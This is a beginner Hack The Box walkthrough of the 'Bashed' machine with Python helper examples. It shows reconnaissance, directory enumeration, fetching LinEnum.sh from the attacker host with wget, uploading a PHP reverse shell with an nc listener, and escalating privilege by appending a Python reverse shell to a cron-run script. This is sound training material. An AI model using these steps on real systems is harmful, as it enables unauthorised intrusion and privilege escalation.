In this article, Prof. Herbert Fernandez Tamayo starts the series called «Hack The Box Series» (Getting started in HTB).
This is a beginner-friendly and very detailed tutorial that answers two questions: what skills do you need to complete the Bashed machine, and how do you complete it?
Without further ado, enjoy the article!
One of the most common questions when we are starting in the information security world is: "should I have technical skills as a programmer?" You may spend hours reading or watching videos without finding a yes/no answer; as a matter of fact, many senior hackers tell us that they could not write a single line of code when they started hacking.
With that in mind, I would like to show how to solve the Hack The Box machine called Bashed, referred to from here on as "the box", so that you can find the answer for yourself. Let's jump in!
Connect to the Hack The Box network. For this you need an active HTB profile and ideally a Linux-based operating system such as Kali Linux or Parrot OS. Then download the OpenVPN connection pack from your profile and connect with it. It is recommended that you create a directory to store the screenshots and files produced in the different phases, and it is a good idea to take your own notes; you may use a word processor or software like CherryTree, Obsidian and others.
Phase 1: reconnaissance.
We need to gather information about which ports are open on the machine. One of the best tools for the task is Nmap. The syntax of the command is:
nmap -sC -sV -oA <filename> <bashed_ip_address>
- -sC: run the default set of NSE scripts against each open port.
- -sV: probe the open ports to identify the service, its name and its version.
- -oA: save the result in three formats at once (normal .nmap, greppable .gnmap and .xml); this is a good idea because each format suits a different way of analysing the results (reading, grep/awk, or parsing from a script). This parameter is optional; it is up to you.
- Note that without -p, Nmap only scans its 1000 most common TCP ports; if nothing else turns up it is worth a full sweep with -p- (all 65535 ports) and a UDP scan, so that a service on an unusual port is not missed.
- Comments about the result:
- There is only one open port, port 80, served by Apache httpd. We obtained the version, 2.4.18, and the banner shows it is running on Ubuntu.
- We should check which Ubuntu release ships Apache 2.4.18. This is not mandatory, but it can be useful, and the idea is to gather all the information we can; if we google something like «Apache 2.4.18 ubuntu version», the results point at Ubuntu 16.04 (Xenial), which packages that exact release.
As a final step in this phase, let's check what port 80 serves: if it is listening, something is published and accessible through it. Open a web browser and type the IP assigned to Bashed.
- The browser shows a website. We do not care about its content as such; what would be great is a link where we could type credentials, or any other resource that helps us gain access to the system or keep collecting information about it. In this case nothing useful stands out on the page itself, which is exactly why the next phase enumerates what the page does not link to.
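The -oA formats are only useful if you actually consume them. As an added example (not code from the original article), here is a small Python parser for the greppable .gnmap file that nmap -oA writes; the sample scan text is constructed to mirror the result described above (host 10.10.10.68, port 80, Apache httpd 2.4.18 on Ubuntu), and the second host and its services are invented for illustration.

```python
"""Parse nmap greppable (.gnmap) output into records you can query.

Added example, not part of the original article.  SAMPLE_GNMAP is a
constructed file: the first host mirrors the Bashed scan described in the
text, the second host is invented to show multiple ports per line.
"""

SAMPLE_GNMAP = (
    "# Nmap scan initiated (constructed sample)\n"
    "Host: 10.10.10.68 ()\tStatus: Up\n"
    "Host: 10.10.10.68 ()\tPorts: 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/"
    "\tIgnored State: closed (999)\n"
    "Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu (protocol 2.0)/, "
    "443/filtered/tcp//https///\n"
    "# Nmap done (constructed sample)\n"
)


def parse_gnmap(text):
    """Return one dict per port entry found in the 'Ports:' lines.

    Each entry in the greppable format is
    port/state/protocol/owner/service/rpc-info/version/  (fields separated
    by '/', entries separated by ', ').
    """
    records = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts: " not in line:
            continue  # comments and 'Status: Up' lines carry no port data
        host = line.split()[1]
        ports_field = line.split("\tPorts: ", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(", "):
            f = entry.split("/")
            records.append({
                "host": host,
                "port": int(f[0]),
                "state": f[1],
                "proto": f[2],
                "service": f[4],
                "version": f[6],
            })
    return records


def open_ports(records, host=None):
    """Filter to open ports, optionally for a single host."""
    return [r for r in records
            if r["state"] == "open" and (host is None or r["host"] == host)]


if __name__ == "__main__":
    for r in open_ports(parse_gnmap(SAMPLE_GNMAP)):
        print("%(host)s %(port)d/%(proto)s %(service)s %(version)s" % r)
```

On a real engagement you would read the file nmap wrote (open("bashed.gnmap").read()) instead of SAMPLE_GNMAP; the parser is the same.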
Phase 2: enumeration.
We need to identify resources on the machine that can eventually help us gain access. One approach is to enumerate files and directories; for that we may use tools like DirBuster, gobuster and feroxbuster. On this occasion I will use gobuster (its dir mode), with two parameters:
- -u: the URL to enumerate; don't forget to include the protocol, either http or https.
- -w: the wordlist (dictionary) to use for the enumeration.
- Part of the results are directories like php, uploads and dev. We should take a look at each directory to verify whether there are exploitable resources; this time we will focus on the dev directory.
- Also, I stopped gobuster with Ctrl+C because I already had the result I needed, but it is a good idea to let the enumeration finish.
- Research what other wordlists are available in Kali Linux.
- Repeat the enumeration above using DirBuster and feroxbuster.
Go back to the web browser and let's see what is inside dev:
- the script in that directory provides a terminal-like interface in the browser; from here we can execute commands as the account the web server runs under. A web shell left reachable in the web root is already a serious finding on its own.
- In the image above we can see the output of the commands id, ls and ifconfig.
- is this your first time using a terminal? If so, research the advantages of using a terminal.
- what is the equivalent of a Linux terminal on Windows?
- Answer for yourself: why should you develop skills with non-GUI tools?
So, we have an interface that lets us execute commands, and at this point we need hints about resources that could help us gain access: user accounts, vulnerabilities in the OS, exploitable running processes, among others. This is where the level of a researcher (ethical hacker, pentester, red teamer, etc.) shows: brute force should be the last option, because one of the objectives is to make as little noise as possible during the test. Remember that in a company there should be a team monitoring for malicious activity, and a brute-force tool generates exactly the kind of traffic they look for.
Let's run a test; please follow these steps:
- Go to your web browser and search for something like "LinEnum repository"
- Once you find it, clone it to your OS
- Copy the file LinEnum.sh to your working directory
In the images below you can find part of the requested execution:
Now we need to upload this script to the box. As a first step, let's start an HTTP server on our machine. We could use Apache, but the quickest option is Python's built-in http.server module, started from the directory that holds LinEnum.sh:
As you can see, we are listening on port 80 for incoming connections (binding a port below 1024 requires root, so the server has to be started with sudo).
Let's go back to the box and fetch LinEnum.sh from our Kali machine:
The command is: wget http://10.10.14.3/LinEnum.sh
- wget: a non-interactive downloader; it opens an HTTP connection to the host in the URL. Here it connects to port 80, the default port for HTTP, so the port does not need to be written in the URL.
- the IP address 10.10.14.3 is the one assigned to my Kali OS (on the tun0 interface) after connecting to the HTB VPN; it is not the IP assigned by the LAN we are part of.
- If the requested file is found, it is downloaded to the machine that made the request, in this case our box, into the current working directory.
- Pay attention to the directory where LinEnum.sh was copied (/dev/shm). Research the permissions of that directory and why it is a common choice for dropping tools; also read about /dev/null.
- What are files with the .sh extension?
- How can we be sure that we can execute LinEnum.sh in /dev/shm? (Check the file's permission bits and the mount options of /dev/shm; on hardened systems it is mounted noexec, in which case the script can still be run by passing it to the interpreter instead of executing it directly.)
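The two web tasks on this page, enumerating directories with a wordlist (phase 2) and pulling a file from a server we host (the LinEnum.sh transfer above), both come down to plain HTTP requests. As an added example, not code from the original article or from gobuster or wget, the Python block below does both against a throw-away local server, so it runs offline: the directory layout, the wordlist and the "LinEnum.sh" contents are constructed for the demo. On Kali the real server is python3 -m http.server 80 run in the directory holding the file.

```python
"""Minimal gobuster-style enumeration and wget-style fetch, against a local
http.server.  Added example; everything served here is constructed."""
import hashlib
import os
import shutil
import tempfile
import threading
import urllib.error
import urllib.request
from functools import partial
from http.server import HTTPServer, SimpleHTTPRequestHandler


class QuietHandler(SimpleHTTPRequestHandler):
    def log_message(self, *args):  # silence per-request logging for the demo
        pass


def serve_dir(directory):
    """Serve `directory` on 127.0.0.1 on a free port, in a daemon thread
    (the same thing `python3 -m http.server` does on the attacker box)."""
    srv = HTTPServer(("127.0.0.1", 0), partial(QuietHandler, directory=directory))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def enumerate_paths(base_url, wordlist):
    """Request base_url/<word>/ for every word; keep anything that is not a
    404 (200, 403, 301 ... all mean 'something is there').  Returns
    {word: status}."""
    found = {}
    for word in wordlist:
        try:
            with urllib.request.urlopen("%s/%s/" % (base_url, word)) as resp:
                found[word] = resp.status
        except urllib.error.HTTPError as err:
            if err.code != 404:
                found[word] = err.code
    return found


def fetch_and_verify(url, expected_sha256):
    """Download a file and check it against the hash computed on the sending
    side, so a truncated or tampered transfer is noticed before running it."""
    with urllib.request.urlopen(url) as resp:
        data = resp.read()
    return data, hashlib.sha256(data).hexdigest() == expected_sha256


def demo():
    root = tempfile.mkdtemp()
    for d in ("dev", "uploads", "php", "images"):   # constructed web root
        os.makedirs(os.path.join(root, d))
    tool = b"#!/bin/bash\necho 'LinEnum placeholder (constructed)'\n"
    with open(os.path.join(root, "LinEnum.sh"), "wb") as fh:
        fh.write(tool)
    srv, base = serve_dir(root)
    try:
        hits = enumerate_paths(base, ["admin", "dev", "uploads", "php", "backup"])
        _, ok = fetch_and_verify(base + "/LinEnum.sh",
                                 hashlib.sha256(tool).hexdigest())
    finally:
        srv.shutdown()
        srv.server_close()
        shutil.rmtree(root)
    return hits, ok


if __name__ == "__main__":
    print(demo())  # ({'dev': 200, 'uploads': 200, 'php': 200}, True)
```

Note that "images" exists on the server but is not reported: a wordlist scan only finds what the wordlist contains, which is why the exercise above asks you to compare wordlists. The hash check is the step people skip; on the real box, sha256sum on both sides does the same job.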
If everything went OK, running ls should show a file called LinEnum.sh. Cool! Now let's run it:
You should start to see a lot of output; wait until the script ends and then look for this part of the output:
This is the list of accounts on the OS, taken from /etc/passwd. Note that for many of them the last field of the line (the login shell) is nologin, which means nobody can log in interactively as that account. Also look at the end of the block, where the last entries look quite different from the others: they have a real login shell and a home directory under /home, which marks them as ordinary user accounts.
- Research the difference between the fields of each group of accounts.
All right, the account scriptmanager is pretty interesting; let's try to execute a command as scriptmanager:
sudo -u scriptmanager whoami
OK, we obtained output (scriptmanager) and no password prompt: sudo lets the web server's account run commands as scriptmanager without authenticating, which hints that we can run any command as that user (sudo -l lists exactly what the current user may run, and is the check to make before guessing). However, we need a fully functional environment, a real terminal, to keep working on this machine; in the current condition we only have a very basic web shell and it is hard to continue.
Do you remember the results of the gobuster directory scan? Go back and check them for the entry related to the uploads directory. There we are going to upload "a malicious file", a PHP reverse shell, that helps us obtain a full shell environment and then escalate privileges.
Let's go back to our Kali OS and, from the terminal, type:
Hint: research what a bind shell and a reverse shell are, and why they are useful.
The image above shows the full path of the PHP reverse shell we need; copy it to your current working directory and, if everything goes as expected, ls should show an output like this:
Note that the file name is different; that's on me, it is not necessary to change it.
Cool, now let's open this file, locate the variables called $ip and $port and change them to our tun0 IP address and port 8081, then save the file and close the editor. The result, in my case, looks like this:
OK, our reverse shell is ready. We need to start a web server again in order to upload it to the box; look back in this writeup for how we did that with LinEnum.sh.
Awesome, let's go back to the box and, with our web server listening, go to /var/www/html/uploads and type the next command:
In the image below you can find the sequence of steps:
Phase 3: Gaining Access
Here comes the fun part, when all this effort turns into a result. From your Kali OS:
- from your terminal window, open a new tab
- from there we need to start a "listener", so type: nc -lvnp 8081 (remember the port you typed inside the reverse shell? This is it)
- Next, go to your web browser, open a new tab and type: http://<ipbashedbox>/uploads/phprshell.php
- is the page still loading? If so, don't stop it: the PHP script is running and holding the connection back to your listener
- <ipbashedbox> = in my case it is 10.10.10.68
- uploads = the directory where we uploaded the reverse shell we found on our Kali OS
- phprshell.php = the name I gave the reverse shell
Cool, let's go to our Kali and click on the latest terminal, where we opened the listener. Did you find something different, like this:
Of course you did! We are inside the Bashed box!!!
- research how and why a reverse shell helps us gain access to a system (and why it works through a firewall that blocks inbound connections, where a bind shell would not)
Let's continue. We need to tweak this shell so that actions and keystrokes like Up/Down (history), Ctrl+C, tab completion and clearing the screen work. There are different ways to obtain a fully functional terminal; in this case we will use Python. Please be careful executing the next steps:
- python -c 'import pty; pty.spawn("/bin/bash")'
- (Ctrl+Z keystroke, which sends netcat to the background)
- stty raw -echo; fg
- (Press Enter twice)
What is the purpose of those commands? The reverse shell arrives over a socket, not a terminal, so the first command spawns bash inside a pseudo-terminal on the box. Then we pause netcat with Ctrl+Z and, on our own terminal, stty raw -echo stops Kali's terminal from interpreting keystrokes (so Ctrl+C is passed to the box instead of killing netcat) and from echoing them (the remote pty now echoes); fg brings netcat back to the foreground. Note that it is stty raw, not stty -raw: the latter would turn raw mode off.
How do I know if it works? Type the next ones:
- (you should get a message)
- export TERM=xterm (no spaces around the equals sign, or the shell reads it as three separate words)
- did it work? If so, you are a step closer!
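Why does the pty.spawn step matter? Programs such as sudo, su, vi and bash's line editor ask the kernel whether their standard input and output are a terminal (isatty), and a reverse shell fails that test because its ends are a socket. As an added example (not from the original article), the Python block below runs the same probe shell command twice, once over pipes the way a raw reverse shell would see it and once under a pseudo-terminal created with the same primitive pty.spawn uses, and reports what the shell sees. It needs a Unix host with /dev/pts and touches no network; the probe command is constructed for the demo.

```python
"""Show why a reverse shell needs a pty: the same shell command answers
'no terminal' over pipes and 'terminal' under a pseudo-terminal.
Added example, not part of the original article."""
import os
import subprocess

# POSIX test: [ -t FD ] succeeds only if FD is a terminal (what isatty does).
PROBE = ["sh", "-c",
         "if [ -t 0 ] && [ -t 1 ]; then echo HAS_TTY; else echo NO_TTY; fi"]


def shell_sees_tty(use_pty):
    """Run PROBE and return True if the shell saw a terminal on stdin/stdout."""
    if not use_pty:
        # Raw reverse shell: stdin/stdout are a socket or pipe, never a tty.
        out = subprocess.run(PROBE, stdin=subprocess.DEVNULL,
                             stdout=subprocess.PIPE, text=True).stdout
        return "HAS_TTY" in out

    # pty.spawn() does essentially this: allocate a master/slave pair and
    # hand the slave side to the child as its stdin/stdout/stderr.
    master, slave = os.openpty()
    try:
        subprocess.run(PROBE, stdin=slave, stdout=slave, stderr=slave)
    finally:
        os.close(slave)          # drop our copy; the child's closed on exit

    chunks = []
    while True:
        try:
            data = os.read(master, 1024)
        except OSError:          # Linux returns EIO once the slave is gone
            break
        if not data:
            break
        chunks.append(data)
    os.close(master)
    # The pty line discipline turns '\n' into '\r\n'; decoding loosely is fine.
    return "HAS_TTY" in b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    print("over pipes, shell sees a tty:", shell_sees_tty(False))   # False
    print("under a pty, shell sees a tty:", shell_sees_tty(True))   # True
```

The stty raw -echo; fg half of the trick is about the local side: once the remote bash has its own pty, your Kali terminal must stop interpreting Ctrl+C and stop echoing, otherwise every keystroke is handled twice or never reaches the box.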
Cool, let's test some commands:
- sudo -u scriptmanager bash
- ls -la
- Explain what changed.
- Why was it necessary to execute the above commands?
- Take a look at the $HOME of your current user. Do you see something interesting?
Phase 4: Privilege Escalation
All right, last level! Let's go back to the root of the filesystem (/):
Next, let's see if we can find something useful in here:
The output should look like this:
Can you see it? There's a directory called "scripts" and its owner is "scriptmanager", the user we are now running as, so let's take a look:
- cd scripts
- ls -la
We can see two files, one with the .py extension and the other one .txt. Maybe they are related; let's type again:
- ls -la → wait 1 minute
- ls -la → wait another minute
The text file has a different timestamp each time, doesn't it? That means something runs test.py on a schedule (roughly every minute) and rewrites test.txt. Because test.py belongs to scriptmanager and we can edit it, whatever runs that job will also execute any code we append to it.
- open test.py and see what's inside,
- can you guess which programming language those lines belong to?
- What does this script do?
- Go back to your Kali OS, open a new browser tab and search for something like "reverse shell cheat sheet"
- Try to find a result from pentestmonkey.net, open it and copy the entire line related to Python
- Did you get it?
When you have the lines for our Python-based reverse shell, open a text editor and paste them; we need to format them like this:
In the s.connect() call, use your tun0 IP address and an available port, for example 1234.
Finally, copy the lines, making sure they look like the images above; close your text editor and open a listener (netcat) on port 1234, the one we set in the script:
- nc -nlvp 1234
Let's go back to our box and follow these steps:
- edit the file test.py
- go to the last line and press Enter
- paste the lines you copied
- save the file
Your test.py should look like this:
Ready? OK, close your text editor and wait up to a minute, then go back to your Kali OS, specifically to the latest terminal tab. Did you notice something different? The scheduled job ran our modified test.py and connected back to the listener; try these commands:
- cd /root
- cat root.txt
- cd /home
- cd arrexel
- cat user.txt
You did it! You pwned Bashed! Now go to your HackTheBox account and submit the user and root flags.
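The privilege escalation above works because a job with high privileges runs a script that a lower-privileged user can edit. The same question, "could this user change what that script does?", is what a blue team should answer for every scheduled script. As an added example (not from the original article), the Python block below models that check with Unix permission bits: it flags a file the user can write, and also a file the user could replace because the parent directory is writable. It builds a throw-away directory to exercise the cases, so the uids, group ids and modes are constructed; it models plain mode bits only (no ACLs or AppArmor).

```python
"""Could user `uid` change what a scheduled script executes?
Added example, not part of the original article; demo() uses a constructed
temp directory and invented 'other user' ids."""
import os
import shutil
import stat
import tempfile


def _writable_by(st, uid, gids):
    """Classic Unix check: owner bits if owner, else group bits if member,
    else 'other' bits.  Root bypasses mode bits entirely."""
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def user_can_modify(path, uid, gids):
    """True if the user can alter the script's contents, either directly or by
    replacing the file from a writable parent directory."""
    path = os.path.abspath(path)
    file_st = os.lstat(path)
    if uid in (0, file_st.st_uid):
        return True                      # owner can always chmod and rewrite
    if _writable_by(file_st, uid, gids):
        return True
    parent_st = os.lstat(os.path.dirname(path))
    if not _writable_by(parent_st, uid, gids):
        return False
    # Sticky directory (/tmp style): only the file owner, dir owner or root
    # may unlink/rename, so a writable-but-sticky dir does not allow a swap.
    if parent_st.st_mode & stat.S_ISVTX and uid != parent_st.st_uid:
        return False
    return True


def demo():
    """Exercise the common layouts; returns {case: bool}."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "test.py")
    with open(script, "w") as fh:
        fh.write("print('hello')\n")
    me = os.getuid()
    fgid = os.stat(script).st_gid
    other = me + 1                       # constructed: a non-root, non-owner uid
    r = {}
    try:
        os.chmod(d, 0o755)
        os.chmod(script, 0o644)
        r["hardened"] = user_can_modify(script, other, {fgid + 1})
        r["owner"] = user_can_modify(script, me, {fgid})      # the Bashed case
        os.chmod(script, 0o664)
        r["group_writable"] = user_can_modify(script, other, {fgid})
        os.chmod(script, 0o644)
        os.chmod(d, 0o777)
        r["dir_writable"] = user_can_modify(script, other, {fgid + 1})
        os.chmod(d, 0o1777)
        r["sticky_dir"] = user_can_modify(script, other, {fgid + 1})
    finally:
        os.chmod(d, 0o755)
        shutil.rmtree(d)
    return r


if __name__ == "__main__":
    for case, bad in demo().items():
        print("%-15s %s" % (case, "EXPOSED" if bad else "ok"))
```

The fix on the box side follows from the "owner" result: a script run by a privileged job must be owned by that privileged account (not by scriptmanager), live in a directory only that account can write, and be mode 0755 or tighter.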
- This is not a race; do not follow this, or any, writeup just to finish it. Take your time, understand the methodology and, if you have questions, ask them!
- The flags are purely symbolic. What matters is understanding the weaknesses we found, how to exploit them (red team) and how to fix them (blue team): a web shell left reachable under /dev in the web root, an upload directory the web server could write to and execute PHP from, a sudo rule letting the web server's account run commands as scriptmanager without a password, and a scheduled job running, with higher privileges, a script that scriptmanager could edit.
- Now, can you answer this one: is it useful to learn programming and Linux if you want to jump into cybersecurity? Let me know
- ping me on Twitter @heftamayo
Thank you for your time (Prof. Herbert Tamayo).
Contact Prof. Herbert Tamayo